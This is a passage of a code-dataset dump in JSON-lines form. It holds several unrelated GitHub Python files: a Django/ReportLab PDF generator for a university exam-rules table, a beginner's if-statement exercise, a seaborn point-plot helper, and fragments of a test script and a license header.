len(x.unique())).sort_values(ascending=False)\n small_cats = zz[zz<5].index.tolist()\n \n st=time.time()\n tbr = AutoCombine(cols=small_cats[:10], order=2, null_value=-999, num_process=5)\n z1 = tbr.fit(tra_x)\n z2 = tbr.transform(val_x)\n print(time.time()-st)","repo_name":"brakeman/general_pro","sub_path":"to_be_transfor/auto_feat/Piplines/AutoCombine_test.py","file_name":"AutoCombine_test.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8442262312","text":"import itertools\nfrom io import BytesIO\nfrom math import modf\n\nfrom django.http import HttpResponse\nfrom reportlab.lib import colors\nfrom reportlab.lib.enums import TA_CENTER\nfrom reportlab.lib.pagesizes import A4, landscape\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.units import mm, cm\nfrom reportlab.pdfgen import canvas\nfrom reportlab.platypus import BaseDocTemplate, PageTemplate, Paragraph, Table, TableStyle, Frame\nfrom reportlab.platypus.flowables import Flowable\n\nfrom mecc.apps.institute.models import Institute\nfrom mecc.apps.mecctable.models import ObjectsLink, StructureObject, Exam\nfrom mecc.apps.training.models import Training\nfrom mecc.apps.utils.documents_generator.utils.pdf import filter_content\nfrom mecc.apps.utils.queries import get_mecc_table_order\nfrom ..document import Document\n\n\nclass PreviewMeccTable(Document):\n\n def __init__(self, trainings, reference='both'):\n if trainings is not None:\n self.training = Training.objects.get(id=trainings)\n self.reference = reference\n self.respforms = True\n self.mecc_state = True\n self.title_header = \"Prévisualisation du tableau\"\n self.mecctable_header_line_1 = [\"OBJETS\", '', '', '', '', '', \"ÉPREUVES\"]\n\n self.make_watermark_attributes()\n self.doc_setup()\n self.make_styles()\n\n self.story = []\n\n def doc_setup(self):\n self.set_doc_title()\n self.set_response()\n self.set_doc_margins()\n\n self.buffer = BytesIO()\n\n self.document = BaseDocTemplate(\n filename=self.buffer,\n pagesize=landscape(A4),\n leftMargin=self.left_margin,\n rightMargin=self.right_margin,\n topMargin=self.top_margin,\n bottomMargin=self.bottom_margin,\n title=self.title,\n author=\"Université de Strasbourg\",\n showBoundary=0,\n )\n\n self.add_page_templates()\n\n def add_page_templates(self):\n frame_landscape = Frame(\n x1=self.left_margin,\n y1=self.bottom_margin,\n width=self.document.width,\n height=self.document.height,\n id='landscape_frame',\n showBoundary=0\n )\n\n landscape_pagetemplate = PageTemplate(\n id='landscape_pagetemplate',\n frames=[frame_landscape],\n onPage=self.footer_watermark\n )\n\n\n self.document.addPageTemplates([landscape_pagetemplate])\n\n def set_doc_title(self):\n self.title = \"Prévisualisation du tableau\"\n\n def set_response(self):\n self.response = HttpResponse(content_type='application/pdf')\n self.response['Content-Disposition'] = ('filename=\"%s.pdf\"' % self.title)\n\n def set_doc_margins(self):\n self.left_margin = self.right_margin = self.top_margin = self.bottom_margin = 10*mm\n\n def make_styles(self):\n self.styles = getSampleStyleSheet()\n self.styles.add(ParagraphStyle(\n name='CenterSmall',\n alignment=TA_CENTER,\n fontSize=8\n ))\n self.styles.add(ParagraphStyle(\n name='CenterSmallItalic',\n alignment=TA_CENTER,\n fontSize=8,\n fontName=\"Times-Italic\"\n ))\n self.styles.add(ParagraphStyle(\n name='SmallNormal',\n fontSize=8\n ))\n self.styles.add(ParagraphStyle(\n name='SmallBold',\n fontSize=8,\n fontName=\"Helvetica-Bold\"\n ))\n self.styles.add(ParagraphStyle(\n name='InversedBigBold',\n fontSize=11,\n fontName=\"Helvetica-Bold\",\n textColor=colors.white,\n ))\n\n def make_watermark_attributes(self, string='Prévisualisation', x=500, y=-75, rotation=40):\n self.watermark_string = string\n self.watermark_position_x = x\n self.watermark_position_y = y\n self.watermark_rotation = rotation\n\n def build_doc(self):\n self.write_preview_header()\n self.write_landscape_training_infos()\n self.write_table_title()\n self.write_mecctable()\n self.document.build(\n self.story,\n canvasmaker=LandscapeLeftNumberedCanvas\n )\n\n pdf = self.buffer.getvalue()\n self.buffer.close()\n self.response.write(pdf)\n\n return self.response\n\n def write_preview_header(self):\n self.story.append(\n Paragraph(\n \"\\\n %s\" % filter_content(self.title_header),\n self.styles['Normal']\n )\n )\n\n def write_landscape_training_infos(self):\n\n # ############ STYLES ################################\n main_style = [\n ('SPAN', (0, 1), (2, 1)),\n ('SPAN', (3, 0), (3, 1)),\n ('VALIGN', (0, 0), (2, 1), 'MIDDLE'),\n ('FACE', (0, 0), (1, 0), 'Helvetica-Bold'),\n ('SIZE', (0, 0), (2, 0), 11),\n ('TEXTCOLOR', (0, 0), (2, 1), colors.white),\n ('BACKGROUND', (0, 0), (-2, -2), colors.steelblue),\n ('BOX', (0, 0), (-2, -1), 1, colors.black),\n ('LINEABOVE', (0, -1), (-2, -1), 1, colors.black),\n # ('LEFTPADDING', (0, 0), (-1, -1), 0),\n ('RIGHTPADDING', (0, 0), (-1, -1), 3),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 3),\n ('TOPPADDING', (0, 0), (-1, -1), 3),\n # ('GRID', (0, 0), (-1, -1), 1, colors.green)\n ]\n\n side_style = [\n ('BOX', (0, 0), (-1, -1), 0.5, colors.steelblue),\n ('TEXTCOLOR', (0, 0), (-1, -1), colors.steelblue),\n ('FACE', (0, 0), (-1, -1), 'Helvetica-Bold'),\n ('FACE', (0, 1), (-1, 1), 'Helvetica'),\n ('SIZE', (0, 0), (-1, -1), 8),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n # ('GRID', (0, 0), (-1, -1), 1, colors.red)\n ]\n\n # ############ TABLE ################################\n date_cmp = self.training.date_val_cmp.strftime(\n \"%d/%m/%Y\") if self.training.date_val_cmp not in [None, ''] else \"Non\"\n date_des = self.training.date_visa_des.strftime(\n \"%d/%m/%Y\") if self.training.date_visa_des not in [None, ''] else \"Non\"\n date_cfvu = self.training.date_val_cfvu.strftime(\n \"%d/%m/%Y\") if self.training.date_val_cfvu not in [None, ''] else \"Non\"\n\n mecc_state_table = [\n [\"Etat de saisie :\"],\n [\"%s : %s %s : %s\" % (\n \"Règles\", self.training.get_progress_rule_display().lower(),\n \"Tableau\", self.training.get_progress_table_display().lower())\n ],\n [\"%s : %s\" % (\"Validation Composante\", date_cmp)],\n [\"%s : %s\" % (\"Visa DES\", date_des)],\n [\"%s : %s\" % (\"Validation CFVU\", date_cfvu)],\n ]\n\n if self.reference == 'without':\n ref_label = ''\n elif self.reference == 'with_rof':\n ref_label = \"Référence ROF : %s\" % self.training.ref_cpa_rof \\\n if self.training.ref_cpa_rof is not None else ''\n elif self.reference == 'both':\n ref_label = \"Référence ROF : %s\\n\\nRéférence APOGEE : %s\" % (\n self.training.ref_cpa_rof if self.training.ref_cpa_rof is not None \\\n else '',\n self.training.ref_si_scol if self.training.ref_si_scol is not None \\\n else ''\n )\n else:\n ref_label = \"Référence APOGEE : %s\" % self.training.ref_si_scol\n\n table = [\n [\n Paragraph(\"%s\" % filter_content(self.training.label), self.styles['InversedBigBold']),\n \"%s - %s\" % (\n self.training.get_MECC_type_display(),\n self.training.get_session_type_display()\n ),\n ref_label,\n Table(\n mecc_state_table,\n style=side_style\n ) if self.mecc_state else ''\n ],\n [\n Paragraph(\n \"Responsable(s) : \\\n %s\" % \", \".join(\n [e for e in self.training.get_respform_names]\n ),\n self.styles['Normal']\n ),\n '',\n '',\n ''\n ]\n ]\n\n final_table = Table(\n table,\n style=main_style,\n colWidths=[\n 9*cm if self.mecc_state else 12*cm,\n 5*cm if self.mecc_state else 7.15*cm,\n 6.5*cm if self.mecc_state else 8.5*cm,\n 7.15*cm if self.mecc_state else 0*cm\n ],\n spaceBefore = 10,\n )\n\n self.story.append(final_table)\n\n def write_table_title(self):\n table_title_style = [\n ('FACE', (-1, -1), (-1, -1), 'Helvetica'),\n ('FACE', (0, 0), (0, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (0, 0), (0, 0), colors.steelblue),\n ('SIZE', (0, 0), (0, 0), 12),\n ('SIZE', (-1, -1), (-1, -1), 10),\n ('ALIGN', (0, 0), (0, 0), 'LEFT'),\n ('ALIGN', (-1, -1), (-1, -1), 'RIGHT'),\n # ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),\n ('LEFTPADDING', (0, 0), (-1, -1), 0),\n ('RIGHTPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n # ('GRID', (0, 0), (-1, -1), 1, colors.green)\n ]\n table_title = Table(\n [\n [\"Tableau MECC\", \"(E = Écrit, O = Oral, A = Autre)\"]\n ],\n style=table_title_style,\n colWidths=[\n '50%',\n '50%'\n ],\n spaceAfter=8,\n spaceBefore=5\n )\n\n self.story.append(table_title)\n\n def write_mecctable(self):\n\n current_structures = StructureObject.objects.filter(\n code_year=self.training.code_year\n )\n current_links = ObjectsLink.objects.filter(\n code_year=self.training.code_year\n )\n # Ne pas inclure les objets dont le témoin is_existing_rof = False\n # si composante en appui ROF ou formation de type Catalogue NS cf #131\n supply_cmp = Institute.objects.get(code=self.training.supply_cmp)\n if supply_cmp.ROF_support or self.training.degree_type.ROF_code == 'EA':\n current_links = current_links.exclude(is_existing_rof=False)\n current_exams = Exam.objects.filter(\n code_year=self.training.code_year\n )\n\n training_is_ccct = True if self.training.MECC_type == 'C' else False\n\n root_link = current_links.filter(\n id_parent='0',\n id_training=self.training.id).order_by(\n 'order_in_child').distinct()\n links = get_mecc_table_order(\n [e for e in root_link],\n [],\n current_structures, current_links,\n current_exams, self.training, all_exam=True\n )\n\n col_width, width_exams, mecc_table_style, big_table = \\\n self.make_mecctable_header(training_is_ccct)\n\n global count_row\n count_row = 2\n background_blue = []\n\n # ############ POPULATING TABLE ################################\n\n def write_the_table(what):\n \"\"\"\n Recursively add data in strucuture\n \"\"\"\n global count_row\n count_row += 1\n\n if what.get('rank') == 0:\n background_blue.append(count_row)\n\n struct = what.get('structure')\n link = what.get('link')\n exams_1 = what.get('exams_1')\n exams_2 = what.get('exams_2')\n exams_empty = [['', '', '', '', '', '', '', '', '', '', '', '']] \\\n if self.training.session_type != '1' else \\\n [['', '', '', '', '', '']]\n\n def formated(number):\n \"\"\"\n Remove trailing 0\n \"\"\"\n frac, whole = modf(number)\n if frac == 0:\n return int(whole)\n return str(number).rstrip('0')\n\n def write_exams(list_1, list_2):\n exam_table = []\n for ex_1, ex_2 in itertools.zip_longest(list_1, list_2):\n ex_1_table = [\n formated(ex_1.coefficient) if ex_1 is not None else '',\n [\n Paragraph(filter_content(ex_1.label) if ex_1 else '',\n self.styles['SmallNormal']),\n Paragraph(\n \"\" + filter_content(ex_1.additionnal_info) \\\n if ex_1 and ex_1.additionnal_info \\\n else \"\" + \"\",\n self.styles['SmallNormal'])\n ],\n ex_1.type_exam if ex_1 is not None else '',\n ex_1.text_duration if ex_1 is not None else '',\n '' if ex_1 is None \\\n else ex_1.convocation if not training_is_ccct \\\n else ex_1.get_type_ccct_display(),\n ex_1.eliminatory_grade if ex_1 is not None else '',\n ex_1.threshold_session_2 if ex_1 is not None else '',\n ]\n\n ex_2_table = [\n formated(ex_2.coefficient) if ex_2 is not None else '',\n [Paragraph(filter_content(ex_2.label) if ex_2 is not None else '', self.styles[\n 'SmallNormal']), Paragraph(\"\" + ex_2.additionnal_info + \"\" if ex_2.additionnal_info is not None else \"\",\n self.styles['SmallNormal'])],\n ex_2.type_exam if ex_2 is not None else '',\n ex_2.text_duration if ex_2 is not None else '',\n ex_2.eliminatory_grade if ex_2 is not None else '',\n ] if ex_2 is not None else ['', '', '', '', '']\n if self.training.session_type != '1':\n ex_1_table.extend(ex_2_table)\n else:\n ex_1_table.pop()\n exam_table.append(ex_1_table)\n exam_table = exam_table if len(exam_table) > 0 else exams_empty\n if exam_table == exams_empty:\n # TODO: calculate empty space to set rowHeights in order to\n # avoid blank in table\n pass\n inner_table = Table(\n exam_table, colWidths=width_exams, rowHeights=None)\n inner_table.setStyle(TableStyle(\n [('INNERGRID', (0, 0), (-1, -1), 0.1, colors.black),\n ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),\n ('ALIGN', (0, 0), (-1, -1), 'CENTER'),\n ('FONTSIZE', (0, 0), (-1, -1), 8),\n # ('LEFTPADDING', (0, 0), (-1, -1), 0),\n # ('RIGHTPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n ]))\n return inner_table\n\n ref_scol = struct.ref_si_scol if struct.ref_si_scol else \"\" # FIX bug with rof data\n ref_data = (\n Paragraph(struct.ROF_ref, self.styles['CenterSmall']),\n Paragraph(ref_scol, self.styles['CenterSmall'])\n ) if self.reference == 'both' \\\n else Paragraph(struct.ROF_ref, self.styles['CenterSmall']) if self.reference == 'with_rof' \\\n else Paragraph(ref_scol, self.styles['CenterSmall']) if self.reference == 'with_si' \\\n else Paragraph('', self.styles['CenterSmall'])\n\n object_line = [\n Paragraph(\n \"%s \" % (what.get('rank')*10, filter_content(struct.label)),\n self.styles['SmallBold'] if what.get('rank') == 0 \\\n or what.get('structure').nature == 'UE' \\\n else self.styles['SmallNormal']\n ),\n Paragraph(\n struct.get_respens_name if not struct.external_name \\\n else struct.external_name,\n self.styles['CenterSmall'] if not struct.external_name else \\\n self.styles['CenterSmallItalic']\n ),\n [ref_data],\n '30' if self.training.degree_type.ROF_code in self.training_types_for_which_to_display_30_ects\\\n and struct.nature == 'SE'\\\n else struct.ECTS_credit if struct.ECTS_credit else '-',\n formated(link.coefficient) if link.coefficient else '',\n link.eliminatory_grade,\n write_exams(exams_1, exams_2)\n ]\n if self.respforms:\n if self.reference == 'without':\n object_line.pop(2)\n else:\n object_line.pop(1)\n if self.reference == 'without':\n object_line.pop(1)\n\n big_table.append(object_line)\n\n for e in what.get('children'):\n write_the_table(e)\n\n for e in links:\n write_the_table(e)\n\n for e in range(3, len(big_table)):\n if self.respforms:\n if self.reference == 'without':\n mecc_table_style.append(('SPAN', (5, e), (-1, e)))\n else:\n mecc_table_style.append(('SPAN', (6, e), (-1, e)))\n else:\n if self.reference == 'without':\n mecc_table_style.append(('SPAN', (4, e), (-1, e)))\n else:\n mecc_table_style.append(('SPAN', (5, e), (-1, e)))\n\n for e in background_blue:\n mecc_table_style.append(\n ('BACKGROUND', (0, e), (-1, e), colors.lightsteelblue)\n )\n\n col_width.extend(width_exams)\n\n mecc_table = Table(\n big_table,\n style=mecc_table_style,\n colWidths=col_width,\n repeatRows=3\n )\n\n self.story.append(mecc_table)\n\n def make_mecctable_header(self, training_is_ccct):\n\n references = '%s' % (\n \"Référence ROF



Référence APOGEE\" \\\n if self.reference == \"both\" \\\n else \"Référence ROF\" if self.reference == \"with_rof\" \\\n else 'Référence APOGEE' if self.reference == \"with_si\" \\\n else ''\n )\n\n # ############ TABLE STRUCUTURE ################################\n\n mecc_table_style = [\n # POLICE\n ('ALIGN', (0, 0), (-1, -1), 'CENTRE'),\n ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),\n ('FONTSIZE', (0, 0), (-1, -1), 8),\n ('FACE', (0, 1), (-1, 1), 'Helvetica-Bold'),\n # FUSION DE CELLULES\n ('SPAN', (0, 1), (0, 2)),\n ('SPAN', (1, 1), (1, 2)),\n ('SPAN', (2, 1), (2, 2)),\n ('SPAN', (3, 1), (3, 2)),\n ('SPAN', (4, 1), (4, 2)),\n # MARGES INTERIEURES DES CELLULES\n ('LEFTPADDING', (0, 0), (-1, -1), 0),\n ('RIGHTPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n # QUADRILLAGE\n ('GRID', (0, 0), (-1, -1), 0.5, colors.black)\n ]\n\n # - Ugly but tables are almost always ugly\n mecctable_header_line_2 = [\n 'Intitulé',\n 'Responsable',\n Paragraph(\n references,\n self.styles['CenterSmall']\n ),\n VerticalText('Crédit ECTS'),\n VerticalText('Coefficient'),\n VerticalText('Seuil compens.'),\n 'Session principale' if self.training.session_type != '1' \\\n else 'Session unique',\n '', '', '', '', '', '',\n 'Session de rattrapage'\n ]\n\n mecctable_header_line_3 = [\n '', '', '', '', '', '',\n VerticalText('Coefficient'),\n 'Intitulé',\n VerticalText('Type'),\n VerticalText('Durée'),\n VerticalText(\n 'Convocation' if not training_is_ccct else 'CC/CT'),\n VerticalText('Seuil compens.'),\n VerticalText(' Report session 2 '),\n VerticalText('Coefficient'),\n 'Intitulé',\n VerticalText('Type'),\n VerticalText('Durée'),\n VerticalText('Seuil compens.')\n ]\n\n if self.respforms:\n if self.reference == 'without':\n mecctable_header_line_2.pop(2)\n mecctable_header_line_3.pop(2)\n\n mecc_table_style.extend([\n ('FACE', (0, 0), (4, 2), 'Helvetica-Bold'),\n ('FACE', (5, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (5, 0), (-1, 0), colors.white),\n ('SPAN', (0, 0), (4, 0)),\n ('SPAN', (5, 0), (-1, 0)),\n ('BACKGROUND', (5, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:6],\n mecctable_header_line_3[:11]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [9.25*cm, 3.5*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 9.25*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (11, 1)),\n ('SPAN', (12, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (11, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (11, 2), colors.lightgrey),\n ('BACKGROUND', (12, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (12, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [6.6*cm, 2.25*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 4.6*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 4.6*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n else:\n mecc_table_style.extend([\n ('FACE', (0, 0), (5, 2), 'Helvetica-Bold'),\n ('FACE', (6, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (6, 0), (-1, 0), colors.white),\n ('SPAN', (5, 1), (5, 2)),\n ('SPAN', (0, 0), (5, 0)),\n ('SPAN', (6, 0), (-1, 0)),\n ('BACKGROUND', (6, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:7],\n mecctable_header_line_3[:12]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (6, 1), (-1, 1)),\n ('BACKGROUND', (6, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (6, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [8.65*cm, 2.9*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 8.65*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (6, 1), (12, 1)),\n ('SPAN', (13, 1), (-1, 1)),\n ('BACKGROUND', (6, 1), (12, 1), colors.lightgrey),\n ('BACKGROUND', (6, 2), (12, 2), colors.lightgrey),\n ('BACKGROUND', (13, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (13, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [6*cm, 2.25*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 4*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 4*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n else:\n mecctable_header_line_2.pop(1)\n mecctable_header_line_3.pop(1)\n if self.reference == 'without':\n mecctable_header_line_2.pop(1)\n mecctable_header_line_3.pop(1)\n\n mecc_table_style.extend([\n ('FACE', (0, 0), (3, 2), 'Helvetica-Bold'),\n ('FACE', (4, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (4, 0), (-1, 0), colors.white),\n ('SPAN', (0, 0), (3, 0)),\n ('SPAN', (4, 0), (-1, 0)),\n ('BACKGROUND', (4, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:5],\n mecctable_header_line_3[:10]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (4, 1), (-1, 1)),\n ('BACKGROUND', (4, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (4, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [11*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 11*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (4, 1), (10, 1)),\n ('SPAN', (11, 1), (-1, 1)),\n ('BACKGROUND', (4, 1), (10, 1), colors.lightgrey),\n ('BACKGROUND', (4, 2), (10, 2), colors.lightgrey),\n ('BACKGROUND', (11, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (11, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [7.35*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 5.35*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 5.35*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n else:\n mecc_table_style.extend([\n ('FACE', (0, 0), (4, 2), 'Helvetica-Bold'),\n ('FACE', (6, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (5, 0), (-1, 0), colors.white),\n ('SPAN', (4, 1), (4, 2)),\n ('SPAN', (0, 0), (4, 0)),\n ('SPAN', (5, 0), (-1, 0)),\n ('BACKGROUND', (5, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:7],\n mecctable_header_line_3[:12]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [10.1*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 10.1*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (11, 1)),\n ('SPAN', (12, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (11, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (11, 2), colors.lightgrey),\n ('BACKGROUND', (12, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (12, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [6.75*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 4.75*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 4.75*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n\n return col_width, width_exams, mecc_table_style, big_table\n\n def footer_watermark(self, canvas, doc):\n self.custom_watermark(canvas, doc)\n\n def custom_watermark(self, canvas, doc):\n \"\"\"\n Add a custom watermark\n \"\"\"\n canvas.saveState()\n canvas.setFont('Helvetica', 45)\n canvas.setFillGray(0.80)\n canvas.rotate(self.watermark_rotation)\n canvas.drawCentredString(\n self.watermark_position_x,\n self.watermark_position_y,\n self.watermark_string\n )\n canvas.restoreState()\n\n\nclass VerticalText(Flowable):\n '''\n Rotates a text in a table cell.\n '''\n\n def __init__(self, text):\n Flowable.__init__(self)\n self.text = text\n\n def draw(self):\n canvas = self.canv\n canvas.rotate(90)\n fs = canvas._fontsize\n canvas.translate(1, -fs / 1.2) # canvas._leading?\n canvas.drawString(0, 0, self.text)\n\n def wrap(self, aW, aH):\n canv = self.canv\n fn, fs = canv._fontname, canv._fontsize\n return canv._leading, 1 + canv.stringWidth(self.text, fn, fs)\n\n\nclass LandscapeLeftNumberedCanvas(canvas.Canvas):\n \"\"\"\n Canvas allowing to count pages\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n canvas.Canvas.__init__(self, *args, **kwargs)\n self._saved_page_states = []\n\n def showPage(self):\n self._saved_page_states.append(dict(self.__dict__))\n self._startPage()\n\n def save(self):\n \"\"\"add page info to each page (page x of y)\"\"\"\n num_pages = len(self._saved_page_states)\n for state in self._saved_page_states:\n self.__dict__.update(state)\n self.draw_page_number(num_pages)\n canvas.Canvas.showPage(self)\n canvas.Canvas.save(self)\n\n def draw_page_number(self, page_count, position_x=285, position_y=5):\n \"\"\"\n draw page number with custom format and position\n \"\"\"\n if page_count > 0:\n self.setFillGray(0.2)\n self.setFont(\"Helvetica\", 8)\n self.drawRightString(\n position_x * mm, position_y * mm, \"Page %d/%d\" %\n (self._pageNumber, page_count))\n","repo_name":"unistra/eva","sub_path":"mecc/apps/utils/documents_generator/models/preview_mecctable.py","file_name":"preview_mecctable.py","file_ext":"py","file_size_in_byte":32238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16473639394","text":"'Sunt conditi pe care le pui '\r\n\r\nis_male = True\r\nis_tall = True\r\nis_prost= False\r\nis_tampit= True\r\nif is_male or is_tall :\r\n print(\"you are a male or tall or both\")\r\n\r\nelse:\r\n print(\"you are not a male or tall\")\r\n\r\n\r\nif is_male and is_tall :\r\n print(\"you are a tall male \")\r\nelif is_male and not(is_tall):\r\n print(\"you are a short male\")\r\nelif is_male and not is_tall:\r\n print(\"you are a short male\")\r\nelse:\r\n print(\"you are not a male or tall\")\r\n\r\nif is_prost and is_tampit:\r\n print(\"PROSTULE\")\r\nelif is_tampit and not (is_prost) :\r\n print(\"cretinule\")\r\nelse:\r\n print(\"smekeritule\")","repo_name":"DragosBulumac/Exercises1","sub_path":"IF STATEMENTS.py","file_name":"IF STATEMENTS.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73598606247","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef pointplot(x, y, hue, ax, data, order, markers='o', linestyles='-', error=None):\n all_lines = data[hue].unique()\n colors = sns.color_palette('husl', all_lines.shape[0])\n for i_line, line in enumerate(all_lines):\n this_data = data[data[hue] == line]\n x_ax = []\n y_ax = []\n y_err = []\n for i_x, x_label in enumerate(order):\n if np.sum(this_data[x] == x_label):\n y_ax.append(this_data[this_data[x] == x_label][y].values[0])\n if error is not None:\n y_err.append(\n this_data[this_data[x] == x_label][error].values[0])\n x_ax.append(i_x)\n\n ax.plot(x_ax, y_ax, color=colors[i_line], marker=markers,\n linestyle=linestyles, linewidth=0.5, markersize=3, label=line)\n if error is not None:\n ax.errorbar(x_ax, y_ax, yerr=y_err, ecolor=colors[i_line], capsize=3, capthick=1, fmt='none')\n\n ax.set_xticks(np.arange(len(order)))\n ax.set_xticklabels(order)\n ax.legend()\n","repo_name":"fraimondo/sext","sub_path":"sext/pointplot_errbar.py","file_name":"pointplot_errbar.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9987048713","text":"# -*- coding: utf-8 -*-\n#! \\file ./doit/text/pgen/cache/__init__.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-08-05 13:27:09 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nParser generators maintainer cache.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, 